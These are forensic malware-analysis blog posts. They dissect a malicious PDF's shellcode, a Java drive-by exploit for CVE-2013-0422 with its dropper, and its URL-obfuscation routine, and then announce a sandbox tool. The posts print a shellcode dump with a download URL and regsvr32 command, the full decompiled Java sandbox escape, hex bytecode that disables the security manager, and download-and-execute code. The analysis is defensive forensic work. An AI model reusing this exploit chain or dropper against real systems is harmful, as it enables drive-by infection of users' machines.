    000000C0 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB $.‹Ø.Ý‹.‹.Å«^YÃë
    000000D0 53 AD 8B 68 20 80 7D 0C 33 74 03 96 EB F3 8B 68 S.‹h €}.3t.–ëó‹h
    000000E0 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 .‹÷j.Yè˜ÿÿÿâùè..
    000000F0 00 00 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 ..XPj@hÿ...PƒÀ.P
    00000100 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00 00 U‹ì‹^.ƒÃ.ÿãhon..
    00000110 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF hurlmTÿ.ƒÄ.‹èèaÿ
    00000120 FF FF EB 02 EB 72 81 EC 04 01 00 00 8D 5C 24 0C ÿÿë.ër.ì.....\$.
    00000130 C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 Ç.$regsÇD$.vr32Ç
    00000140 44 24 08 20 2D 73 20 53 68 F8 00 00 00 FF 56 0C D$. -s Shø...ÿV.
    00000150 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D ‹è3ÉQÇD..wpbtÇD.
    00000160 05 2E 64 6C 6C C6 44 1D 09 00 59 8A C1 04 30 88 ..dllÆD...YŠÁ.0ˆ
    00000170 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 D..AQj.j.SWj.ÿV.
    00000180 85 C0 75 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 …Àu.j.SÿV.j.ƒë.S
    00000190 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA ÿV.ƒÃ.ë.ë.G€?.uú
    000001A0 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE G€?.uÄj.jþÿV.èœþ
    000001B0 FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01 BD 33 CA ÿÿŽN.ì˜þŠ.‰o.½3Ê
    000001C0 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F Š[.ÆFy6./phttp:/
    000001D0 2F 75 72 62 61 6E 2D 67 65 61 72 2E 63 6F 6D 2F /urban-gear.com/
    000001E0 34 30 34 5F 70 61 67 65 5F 69 6D 61 67 65 73 2F 404_page_images/
    000001F0 30 32 30 36 2E 65 78 65 00 00 0206.exe..
The URL is a dead giveaway. A well trained eye can see additional strings appear, typically as four bytes of op-code followed by four bytes of a string, like: codeDATAcodeDATAcodeDATA (Why? Because it takes about 4 bytes of code to say "move these 4 bytes of data into memory at location X"). A visual analysis shows the command line "regsvr32 -s wpbt.dll", as well as a reference to the DLL "urlmon" (practice looking for those). So, from this, we can tell some of the functionality. We know that it at least downloads an executable file from a remote server to the local temporary path (API call to GetTempPathA) and runs it, and that it also potentially installs a DLL onto the system. A view from within IDA Pro would tell more, but I think I've reached enough text with this posting.
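That codeDATA pattern can be picked out mechanically. The Python sketch below only recognizes the three "mov dword, imm32" encodings that are visible in this particular dump, so treat it as a heuristic for this sample rather than a general stack-string extractor; the function name is made up.

```python
import re

# mov dword ptr [...], imm32 in the three encodings seen in the dump above:
#   C7 04 24 <imm32>        mov [esp], imm32
#   C7 44 24 <d8> <imm32>   mov [esp+d8], imm32
#   C7 44 1D <d8> <imm32>   mov [ebp+ebx+d8], imm32
# Only immediates made of four printable ASCII bytes are kept.
STACK_MOV = re.compile(
    rb"\xc7(?:\x04\x24|\x44[\x24\x1d][\x00-\xff])([\x20-\x7e]{4})"
)


def stack_strings(shellcode):
    """Return the 4-character chunks that the shellcode writes into memory."""
    return [m.group(1).decode("ascii") for m in STACK_MOV.finditer(shellcode)]
```

Applied to the bytes at offset 0x130, this yields "regs", "vr32" and " -s ", which join into the regsvr32 command line. The bytes a little further down give "wpbt" and ".dll".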

To really see what it's doing, I'd chop that code down to the actual functional code, which normally starts after the large block of nulls. In this case, it begins with a somewhat "NOP sled" of 0x4141414141414141. Extract the code and run it through Shellcode2Exe.py, then run the resulting application in OllyDbg. OllyDbg will then resolve the API calls as they're being made, letting you see the calls that include urlmon.URLDownloadToFileA().

That's basically it. A quick one-hour write-up from home using free tools on a malicious PDF sent to my personal account. The end result is pretty boring itself, but I found the JavaScript interesting and decided to publish a few steps for those who were possibly curious about how it worked.

(Pseudo) Exploit Analysis:
Based on a comment that was posted today, I went back to analyse the exploit of the PDF. Exploit analysis isn't my forte by a long shot, but I wanted to show the basic steps of how I approached this file. Also, I was pointed to other blogs that featured this same type of sample, but tried to wave their magic wand of obscurity to say "we manually de-obfuscated it and found...". This isn't rocket science, no need to keep it secret... The magic occurred elsewhere in the PDF, in something we'll call "Object 18":

    18 0 obj
    <</Rect [12.47 5.21 6.13.6.7] /Subtype/Widget /Ff 65536 /T (qwe123b[0]) /MK <</TP 1>> /Type/Annot /FT/Btn /DA (/CourierStd 10 Tf 0 g) /Parent 19 0 R /TU (qwe123b) /P 1 0 R /F 4>>endobj
This object (which is called by 19, which is called by 20, which is called by 21, which is called by 23 (the root object))  draws a rectangle and loads a widget in it named "qwe123b[0]", which refers basically to the output of the JavaScript. So, let's go back to our deobfuscated JavaScript and work backwards:
    qwe123b.rawValue=_ll1
There's our return value... _ll1. So, let's piece together what's returned:
    _ll1=_j8+_j9+_ll0+_j5;
_j8 is a standard block of text, "SUkqADggAABB".
_j9 calls _I2(), which repeats "QUFB" out to a length of 10,984 characters (2,746 copies).
_ll0 is another standard block of text.
_j5 is another standard block of text.
So, I would combine all of these values to see what the output would be. The magic behind it all is that the large block of text this produces is simply a string of Base64 encoded data. Upon decoding, you'll see the magic first few bytes (from _j8):
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 49 49 2A 00 38 20 00 00 41                       II*.8 ..A
These bytes are the file header of a TIFF graphic image. Oh, and those 10,984 characters of repeated "QUFB"? Each "QUFB" Base64 decodes to 0x414141 ("AAA"). That reduces our search. At this point, we would debug Acrobat to follow the flow of data through the application, setting breakpoints at areas that handle graphic images. But, as this isn't a 0-day, a few basic Google searches help lead us to a few possible culprits, all of which are basically libTIFF vulnerabilities. There are numerous ones, but I don't feel that I'm qualified to pinpoint an exact one.
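The header can be confirmed in a few lines of Python. This sketch decodes only the `_j8` prefix and the "QUFB" filler as quoted above; the function name is mine, and the field layout (byte order mark, magic number 42, offset of the first image directory) is the standard TIFF header.

```python
import base64
import struct


def tiff_header(b64_prefix):
    """Decode a Base64 prefix and unpack the 8-byte TIFF header from it."""
    raw = base64.b64decode(b64_prefix)
    # 2-byte byte-order mark, 16-bit magic number, 32-bit offset of the first IFD
    order, magic, ifd_offset = struct.unpack("<2sHI", raw[:8])
    return order, magic, ifd_offset


order, magic, ifd_offset = tiff_header("SUkqADggAABB")
filler = base64.b64decode("QUFB" * 2746)  # 10,984 Base64 characters of padding
```

Here `order` is `b"II"` (little-endian), `magic` is 42 and `ifd_offset` is 0x2038 (8248). The filler decodes to 8,238 "A" bytes, and the 9 bytes from `_j8` plus that filler plus the leading "A" of `_ll0` add up to exactly 8,248, so the image directory the header points at begins immediately after the padding.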

Java Malware - Identification and Analysis


DIY Java Malware Analysis


Parts Required: AndroChef ($) or JD-GUI (free), My Java IDX Parser (in Python), Malware Samples
Skill Level: Beginner to Intermediate
Time Required: Beginner (90 minutes), Intermediate (45 minutes), Advanced (15 minutes)

Java has once again been thrown into the limelight with another resurgence of Java-based drive-by malware attacks reminiscent of the large-scale BlackHole exploit kits seen in early 2012. Through our cmdLabs commercial incident response and forensics team at Newberry Group, I've had the opportunity to perform numerous investigations into data breaches and financial losses due to such malware being installed.
Based on my own experience in Java-related infections, and seeing some very lackluster reports produced by others, I've decided to write a simple How-To blog post on basic Java malware analysis from a forensic standpoint. Everyone has their own process; this is basically mine. It takes the approach of examining the initial downloaded files, seen as Java cached JAR and IDX files, examining the first-stage Java malware to determine its capabilities, and then looking for the second-stage infection.

Java Cached Files

One critical step in any Java infection is to check for files within the Java cache folder. This folder stores a copy of each and every Java applet (JAR) downloaded as well as a metadata file, the IDX file, that denotes when the file was downloaded and from where. These files are stored in the following standard locations:
  • Windows XP: %AppData%\Sun\Java\Deployment\Cache
  • Windows Vista/7/8: %UserProfile%\AppData\LocalLow\Sun\Java\Deployment\Cache
This folder contains numerous subdirectories, each corresponding to an instance of a downloaded file. By sorting the directory recursively by date and time, one can easily find the relevant files to examine. These files will be found auto-renamed to a random series of hexadecimal values, so don't expect to find "express.jar", or whatever file name the JAR was initially downloaded as.
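The recursive sort by date and time can be scripted. The sketch below walks a copy of the cache folder and lists every file oldest first; the function names are mine, and it assumes you point it at a working copy of the evidence so that the file system timestamps are still meaningful.

```python
import os
from datetime import datetime, timezone

def list_cache_files(cache_root):
    """Return (mtime, path) tuples for every file under cache_root, oldest first."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(cache_root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            found.append((os.path.getmtime(path), path))
    return sorted(found)

def print_timeline(cache_root):
    """Print one line per cached file with its modification time in UTC."""
    for mtime, path in list_cache_files(cache_root):
        stamp = datetime.fromtimestamp(mtime, tz=timezone.utc)
        print(stamp.strftime("%Y-%m-%d %H:%M:%S UTC"), path)
```

Calling `print_timeline()` on the copied Cache folder gives a quick list in which each JAR and its matching .idx file should sit next to each other around the time of infection.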

Java IDX Files


In my many investigations, I've always relied upon the Java IDX files to back up my assertions and provide critical indicators for the analysis. While I may know from the browser history that the user was browsing to a malicious landing page on XYZ.com, it doesn't mean that the malware came from the same site. And, as Java malware is downloaded by a Java applet, there will likely be no corresponding history for the download in any web browser logs. Instead, we look to the IDX files to provide us this information.

The Java IDX file is a binary-structured file, but one that is reasonably readable with a basic text editor. Nearly all of my analysis is from simply opening this file in Notepad++ and mentally parsing out the results. For an example of this in action, I would recommend Corey Harrell's excellent blog post: "(Almost) Cooked Up Some Java". This textual data is of great interest to an examiner, as it notes when the file was downloaded from the remote site, what URL the file originated from, and what IP address the domain name resolved to at the time of the download.

I was always able to retrieve the basic text information from the file, but the large blocks of binary data always bugged me. What data was I missing? Were there any other critical indicators in the file left undiscovered?

Java IDX Parser


At the time, no one had written a parser for the IDX file. Harrell's blog post above provided the basic text structure of the file for visual analysis, and a search led me to a Perl-based tool written by Sploit that parsed the IDX for indicators to output into a forensic timeline file at: Java Forensics using TLN Timelines. However, none delved into the binary analysis. Facing a new lifestyle change and a drastic home move, I found myself with a lot of extra time on my hands in January and February, so I decided to sit down and unravel this file. I made my mark by writing my initial IDX file parser, which only carved the known text-based data, and placed it up on GitHub to judge interest.




On a side note, I had hoped for this to be a personal challenge for me to unwind on while moving. Upon posting my initial program I packed away my PC and began moving to my new home. Two weeks later, after digging out and setting up, I found that the file was used as a catalyst for some awesome analysis. I applaud the great effort and documentation made by Mark Woan and Joachim Metz.

In the weeks since the initial release I added numerous features and learned more about the structure. I learned that the file is composed of five distinct "sections", as named by Java:
  • Section 1 - Basic metadata on the status of the download. Was it completed successfully? What time was it completed at? How big is the IDX file?
  • Section 2 - Download data. This is the "text" section of the file and contains numerous length-prefixed strings situated in Field:Value pairs
  • Section 3 - Compressed copy of the JAR file's MANIFEST document
  • Section 4 - Code Signer information, in Java Serialization form
  • Section 5 - Additional data (Haven't found a file yet with this)
It's somewhat difficult to measure the forensic value of the data recovered from sections 3 and 4. The Manifest does give information on what version of Java the applet was compiled with, and for, but is just a duplicate if the JAR is still present on the infected system. Section 4 data typically provided scant details, sometimes just the character "0" or just null bytes, on Java malware I've analyzed. Instead of attempting interpretation on this data, I've just displayed it to the screen for our posterity to unravel.
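To illustrate what "length-prefixed strings in Field:Value pairs" means for Section 2, here is a generic reader. It is a sketch only: the 2-byte big-endian length prefix, the function names, and the idea that the pair count is known in advance are all assumptions for illustration, not a description of the actual IDX layout or of my parser's code.

```python
import struct

def read_prefixed_string(buf, offset):
    """Read one string stored as an assumed 2-byte big-endian length followed by the text."""
    (length,) = struct.unpack_from(">H", buf, offset)
    start = offset + 2
    text = buf[start:start + length].decode("utf-8", errors="replace")
    return text, start + length

def read_pairs(buf, offset, count):
    """Read `count` field/value pairs laid out back to back, returning them and the end offset."""
    pairs = []
    for _ in range(count):
        field, offset = read_prefixed_string(buf, offset)
        value, offset = read_prefixed_string(buf, offset)
        pairs.append((field, value))
    return pairs, offset
```

The point of the design is that no delimiter is needed: each length tells the reader exactly where the next string begins, which is why the text is readable in an editor but surrounded by what looks like binary noise.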

When put into use on the sample we're analyzing, here are the results shown from my IDX Parser.

E:\Development\Java_IDX_Parser>idx_parser.py e:\malware\java_XXX\1c20de82-1678cc50.idx
Java IDX Parser -- version 1.3 -- by @bbaskin
IDX file: e:\malware\java_XXX\1c20de82-1678cc50.idx (IDX File Version 6.05)

[*] Section 2 (Download History) found:
URL: http://80d3c146d3.gshjsewsf.su:82/forum/dare.php?hsh=6&key=b30a14e1c597bd7215d593d3f03bd1ab
IP: 50.7.219.70
<null>: HTTP/1.1 200 OK
content-length: 7162
last-modified: Mon, 26 Jul 2001 05:00:00 GMT
content-type: application/x-java-archive
date: Sun, 13 Jan 2013 16:22:01 GMT
server: nginx/1.0.15
deploy-request-content-type: application/x-java-archive


[*] Section 3 (Jar Manifest) found:
Manifest-Version: 1.0
Ant-Version: Apache Ant 1.8.3
X-COMMENT: Main-Class will be added automatically by build
Class-Path:
Created-By: 1.7.0_07-b11 (Oracle Corporation)


[*] Section 4 (Code Signer) found:
[*] Found: Data block.  Length: 4
Data:                   Hex: 00000000
[*] Found: Data block.  Length: 3
Data: 0                 Hex: 300d0a
Analysis of the infected file system showed activity to a completely different web site, and then a sudden infection. By timelining the events, I found the missing download information from the Java malware in the IDX file, from a domain not found elsewhere on the system.
There are a number of Java IDX parsers out there, which emerged quickly after I first published mine. Many provide good starting ground for getting obvious artifacts from the file, but I do recommend trying them all to see which works best for you.


Java Malware Analysis


With the relevant Java malware file identified, I began the analysis of the file. Typically, many examiners use a free decompiler like JD-GUI, which is a pretty useful tool for the cost. However, I've found in many cases that JD-GUI cannot appropriately decompile most of the file and ends up disassembling most of it. This means that the analysis isn't done on clean Java code, but instead on Java op-codes. This is certainly possible, and I gave a presentation to the Northern Virginia Hackers group this past year on how to do that, but it's a lot of effort and tiresome. Instead, through a thorough analysis of the current tools available, I've switched to AndroChef for all of my analysis. It still misses some, but decompiles more code than other tools can.

Before going in, VirusTotal reports that this file was flagged by 2 of 46 engines for CVE-2013-0422. That gives us a clue of what exploit code to search for.

Using AndroChef on the malware file I was able to retrieve the Java code, which was contained across five separate Class files. These Class files alone are compiled modules, but data can traverse across them, requiring an examiner to analyze all of them simultaneously. For me, the easiest method is to copy and paste them all into one text document, to edit with Notepad++. This allows me to sweep-highlight a variable and quickly find every other location where that variable is in use. After a cursory analysis, I try to determine, at a high level, the purpose of each class:
  • Allaon.class - Contains all of the strings used in the malware
  • Lizixk - Contains the dropper code
  • Morny - Contains the text decryption routines
  • Rvre - Contains an embedded Java class
  • Zend - Contains the main code
The JAR also contained the standard META-INF/MANIFEST file, which matched the results shown from my IDX parser.

If you don't want to decode these files yourself, I have them available here for download.

The text within Allaon.class is obfuscated by including the text "Miria_)d" throughout each string, as shown below:

   public static String Gege = "fiesta".replace("Miria_)d", "");
   public static String Gigos = "sMiria_)dun.iMiria_)dnvoke.aMiria_)dnon.AMiria_)dnonMiria_)dymousClasMiria_)dsLoMiria_)dader".replace("Miria_)d", "");
   public static String Momoe = "f" + "ilMiria_)d///".replace("Miria_)d", "e:");
   public static String BRni = "j" + "avMiria_)da.io.tmMiria_)dpdiMiria_)dr".replace("Miria_)d", "");
   public static String Tte3 = "heMiria_)dhda.eMiria_)dxe".replace("Miria_)d", "");
   public static String Contex = "sun.orMiria_)dg.moziMiria_)dlla.javascMiria_)dript.inMiria_)dternal.ConMiria_)dtext".replace("Miria_)d", "");
   public static String ClsLoad = "sun.orMiria_)dg.mozMiria_)dilla.javasMiria_)dcript.inteMiria_)drnal.GeneraMiria_)dtedClaMiria_)dssLoader".replace("Miria_)d", "");
   public static String hack3 = "SophosHack";
   public static String Fcons = "fiMiria_)dndConstrMiria_)ductor".replace("Miria_)d", "");
   public static String Fvirt = "fiMiria_)dndVirtMiria_)dual".replace("Miria_)d", "");
   public static String hack2 = "SophosHack";
   public static String Crtcls = "creaMiria_)dteClasMiria_)dsLMiria_)doader".replace("Miria_)d", "");
   public static String DEfc = "defiMiria_)dneClaMiria_)dss".replace("Miria_)d", "");
By performing a simple find/replace, removing excess code, and globally giving descriptive variable names, the following results are then shown:


   public static String FiestaTag = "fiesta";
   public static String InvokeAnonClassLoader = "sun.invoke.anon.AnonymousClassLoader";
   public static String FileURI = "file:///";
   public static String TempDir = "java.io.tmpdir";
   public static String s_hehda_exe = "hehda.exe";
   public static String MozillaJSContext = "sun.org.mozilla.javascript.internal.Context";
   public static String MozillaJSClassLoader = "sun.org.mozilla.javascript.internal.GeneratedClassLoader";
   public static String hack3 = "SophosHack";
   public static String s_findConstructor = "findConstructor";
   public static String s_findVirtual = "findVirtual";
   public static String hack2 = "SophosHack";
   public static String s_createClassLoader = "createClassLoader";
   public static String s_defineClass = "defineClass";
This provides a much better clue as to what is going on, especially as the author was fairly descriptive in his variable naming and didn't randomize the names upon deployment. I can then highlight each variable and find where else in the code that string is being used. I will then continue to find any such obfuscation throughout the code and remove it a bit at a time, condensing the code back to what it was originally written as.
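The find/replace step can also be automated. The sketch below folds each literal `.replace()` call in the decompiled source back into a plain string; the regular expression and function name are my own, and it assumes the literals contain no escaped quotes, which holds for the strings shown above.

```python
import re

# Matches "literal".replace("needle", "substitute") as emitted by the decompiler.
REPLACE_CALL = re.compile(r'"([^"]*)"\.replace\("([^"]*)",\s*"([^"]*)"\)')

def fold_replace_calls(java_source):
    """Evaluate each literal .replace() call and substitute the resulting string literal."""
    def evaluate(match):
        literal, needle, substitute = match.groups()
        return '"' + literal.replace(needle, substitute) + '"'
    return REPLACE_CALL.sub(evaluate, java_source)

line = 'public static String Tte3 = "heMiria_)dhda.eMiria_)dxe".replace("Miria_)d", "");'
print(fold_replace_calls(line))   # public static String Tte3 = "hehda.exe";
```

Lines such as Momoe, where the replacement text is "e:" rather than an empty string, are handled the same way because the substitute is taken from the call itself rather than assumed to be empty.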
By following the logic, and renaming variables (globally) when needed, we get a main code function that boils down to:

   public void init() {
      try {
         Rvre.sfgkytoi = this.getParameter("fiesta");
         byte[] Embedded_Java_Class = Rvre.Hex2Bin(Embedded_Java_Class_hex);

         JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
         JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", (MBeanServer)null, (MBeanServerDelegate)null);
         MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
         Object a = null;
         Class localClass1 = localMBeanInstantiator.findClass(Allaon.Contex, (ClassLoader)a);
         Class localClass2 = localMBeanInstantiator.findClass(Allaon.ClsLoad, (ClassLoader)a);
         Lookup lolluk = MethodHandles.publicLookup();
         MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{MethodType.class});
         MethodHandle localMethodHandle1 = lolluk.findVirtual(Lookup.class, Allaon.Fcons, localMethodType1);
         MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
         MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[]{lolluk, localClass1, localMethodType2});
         Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
         MethodType ldmet3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{String.class, MethodType.class});
         MethodHandle localMethodHandle3 = lolluk.findVirtual(Lookup.class, "findVirtual", ldmet3);
         MethodType ldmet4 = MethodType.methodType(localClass2, ClassLoader.class);
         MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass1, "createClassLoader", ldmet4});
         Object lObj2 = localMethodHandle4.invokeWithArguments(new Object[]{localObject1, null});
         MethodType ldmet5 = MethodType.methodType(Class.class, String.class, new Class[]{byte[].class});
         MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass2, "defineClass", ldmet5});

         Class lca3 = (Class)localMethodHandle5.invokeWithArguments(new Object[]{lObj2, null, Embedded_Java_Class});
         lca3.newInstance();
         Lizixk.DropFile_Exec();
      } catch (Throwable var22) {
         ;
      }
   }
Much of this is straightforward. However, there is a very large block of "MethodType" and "MethodHandle" calls that are a result of the exploit, CVE-2013-0422. More on this exploit is found on Microsoft's TechNet site.  The actual runtime magic appears as a single function call to the Lizixk class, which contains a function to retrieve an executable, decode it, drop it to %Temp%, and run it.  But how can such malicious logic work? A look at the top of this same function shows us the actual exploit that makes it happen. This function contains a long, obfuscated string value that has the phrase "mMoedl" throughout it, similar to the encoding used by the strings in Allaon. Upon removing this excess text, we can clearly see the first eight hex characters (four bytes) as "CAFEBABE":


public static String Ciasio = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017"
This is the magic value, in hex, for compiled Java code. That tells us what we're looking at, and that the string needs to be converted from hex to binary and saved to a file. Doing so produces another file that we can decompile with AndroChef, producing the following code:


import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B implements PrivilegedExceptionAction {
   public B() {
      try {
         AccessController.doPrivileged(this);
      } catch (Exception var2) {
         ;
      }
   }
   public Object run() {
      System.setSecurityManager((SecurityManager)null);
      return new Object();
   }
}
Wow! Such simple code, but a few items are glaring. First off, this file was flagged by 1 of 46 engines on VirusTotal, as Java/Dldr.Pesur.AN. This code really just sets the Java security manager to null from within a privileged block, which lifts the sandbox restrictions on the parent code and gives it the ability to drop and execute the second-stage malware.
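The earlier step of turning the cleaned-up hex string into a class file can be sketched in Python as follows. The function name is mine, and the sample string is just the first eight bytes of the real value with the "mMoedl" junk re-inserted at arbitrary points for illustration; the true junk positions are not reproduced here.

```python
import struct

JAVA_CLASS_MAGIC = 0xCAFEBABE

def hex_to_class_bytes(obfuscated_hex, junk="mMoedl"):
    """Strip the junk marker, convert hex text to bytes, and verify the class file magic."""
    raw = bytes.fromhex(obfuscated_hex.replace(junk, ""))
    # Class file header: 4-byte magic, 2-byte minor version, 2-byte major version (big-endian).
    magic, minor, major = struct.unpack(">IHH", raw[:8])
    if magic != JAVA_CLASS_MAGIC:
        raise ValueError("not a Java class file")
    return raw, major, minor

sample = "CAFEmMoedlBABE0000mMoedl0032"   # illustrative junk placement only
raw, major, minor = hex_to_class_bytes(sample)
print(major, minor)                        # 50 0
```

Writing the full `raw` value to disk in binary mode gives the file to load into the decompiler. A major version of 50 corresponds to the Java SE 6 class file format.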
With everything analyzed, we stopped at the function call to Class Lizixk that drops and runs the malware. Now that the exploit has launched and privileges have been escalated, this dropper routine is run:


public class Lizixk {
   public static String TempDir = getProperty("java.io.tmpdir");
   static InputStream filehandle;
   public static void DropFile_Exec() throws FileNotFoundException, Exception {
      if(TempDir.charAt(TempDir.length() - 1) != '\\') {
         TempDir = TempDir + "\\";
      }
      String Hehda_exe = TempDir + "hehda.exe";
      FileOutputStream output_filehandle = new FileOutputStream(Hehda_exe);
      DownloadEXE();
      int data_size;
      for(byte[] rayys = new byte[512]; (data_size = filehandle.read(rayys)) > 0; rayys = new byte[512]) {
         output_filehandle.write(rayys, 0, data_size);
      }
      output_filehandle.close();
      filehandle.close();
      Runtime.getRuntime().exec(Hehda_exe);
   }
   public static void DownloadEXE() throws IOException {
      URL fweret = new URL(Morny.data_decode(fiesta));
      fweret.openConnection();
      filehandle = fweret.openStream();
   }
}
There are two routines in play here, renamed by me: DropFile_Exec() and DownloadEXE(). The first is called by Class Zend and is responsible for determining the Temporary folder (%Temp%) and creating a file named "hehda.exe". It then calls DownloadEXE(). This latter routine retrieves the embedded HTML data for the parameter "fiesta", decodes it with a custom routine to retrieve a URL, then downloads that file to "hehda.exe".

After this, the file is run and the second-stage malware begins. This is standard operating procedure, as the second stage typically belongs to the operator who purchased the exploit kit and wants their malware installed. They just require the use of the first stage (BlackHole) to get it running on the system.


Custom Data Encoding


I have a deep love for custom encoding and encryption routines, so even without the raw data, I analyzed the encoding for the URL, found in Class Morny:

   public static String data_decode(String web_data) {
      int byte_pos = 0;
      web_data = (new StringBuffer(web_data)).reverse().toString();
      String decoded_data = "";
      web_data = web_data.replace("a-nytios", "");
      for(int i = 0; i < web_data.length(); ++i) {
         ++byte_pos;
         if(byte_pos == 3) {
            decoded_data = decoded_data + web_data.charAt(i);
            byte_pos = 0;
         }
      }
      return decoded_data;
   }
There are a lot of little routines going on here. The encoded data is retrieved from the web site HTML, then put into reverse order. It removes the text instances of "a-nytios" from the data, just as the Java did with its embedded data. It then retrieves every third byte of the data, discarding the rest. For example:



Encoded: z1eZmxsoityn-a7aeeF.pxlhsiTxvR7ejI/H4soityn-amuto6IceE.yre9EtcNii7scKdtsoityn-aJazybPT.ZSwFqsoityn-awNSwPd/p8/Mu:YVpsoityn-aEQtRrtH4soityn-ahgR
Reversed: Rgha-nytios4HtrRtQEa-nytiospVY:uM/8p/dPwSNwa-nytiosqFwSZ.TPbyzaJa-nytiostdKcs7iiNctE9ery.EecI6otuma-nytios4H/Ije7RvxTishlxp.Feea7a-nytiosxmZe1z
Phrase-removed: Rgh4HtrRtQEpVY:uM/8p/dPwSNwqFwSZ.TPbyzaJtdKcs7iiNctE9ery.EecI6otum4H/Ije7RvxTishlxp.Feea7xmZe1z
Every third byte: http://www.badsite.com/evil.exe


One reason I call this out is because there's little reporting on the routine. It's common across multiple variants of BlackHole/Redkit/fiesta/etc. You understand it better by reading through the code (and recreating it in Python/Perl) than guessing your way through it (see "llobapop" ;))
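As an example of recreating the routine, here is a short Python port of data_decode(). It follows the decompiled Java step for step; the default junk phrase is the one from this sample and may well differ in other variants.

```python
def data_decode(web_data, junk="a-nytios"):
    """Python port of Morny.data_decode(): reverse, strip the junk phrase, keep every third character."""
    cleaned = web_data[::-1].replace(junk, "")
    return cleaned[2::3]

encoded = ("z1eZmxsoityn-a7aeeF.pxlhsiTxvR7ejI/H4soityn-amuto6IceE.yre9EtcNii7scKdt"
           "soityn-aJazybPT.ZSwFqsoityn-awNSwPd/p8/Mu:YVpsoityn-aEQtRrtH4soityn-ahgR")
print(data_decode(encoded))   # http://www.badsite.com/evil.exe
```

The slice `[2::3]` mirrors the Java counter that appends a character each time byte_pos reaches 3, so any trailing one or two characters are dropped just as they are in the original.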

Second-Stage Malware Analysis


The end result of this Java malware is to place a single executable onto your system and run it. The malware doesn't even know where that executable is to come from; it relies upon an external source (the "fiesta" parameter) to tell it where to download it from. This is how we separate the various stages of an infection. The Java first-stage is the Trojan horse to breach the walls, while hehda.exe is the Greek army hidden within.
Through the infection, we found that the second-stage malware was a variant of the ZeroAccess Rootkit, a pretty nasty piece of work. However, our time has grown long on this post so I will leave analysis of that file for the next one. We will reconvene to discuss ZeroAccess, how it entrenches itself onto the system, how IDA Pro likes to puke on it, and how Windows undocumented API calls give it so much power over your computer.

Noriben - Your Personal, Portable Malware Sandbox


Announcing Noriben


Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.

Noriben is an ideal solution for many unusual malware instances, such as those that would not run from within a standard sandbox environment. These files perhaps required command line arguments, or had VMware/OS detection that had to be actively debugged, or extremely long sleep cycles. These issues go away with Noriben. Simply run Noriben, then run your malware in a way that will make it work. If there is active protection, run it within OllyDbg/Immunity while Noriben is running and bypass any anti-analysis checks. If it has activity that changes over days, simply kick off Noriben and the malware for a long weekend and process your results when you return to work.

Noriben only requires Sysinternals procmon.exe. You may optionally first tailor Procmon to your particular VM, a step that is unique to each individual person and their environment, in order to filter out the noise of benign activity from logs. Alternatively, the filtering within Procmon can be kept sparse and you could instead place numerous filters within Noriben to filter out the noise. (My personal preference is to perform moderate filtering from within Procmon and the rest from Noriben, which allows me to quickly remove filters for specific malware that likes to mimic benign services.) If you create Procmon filters, simply save the file as ProcmonConfiguration.pmc in the same folder as Noriben.py.

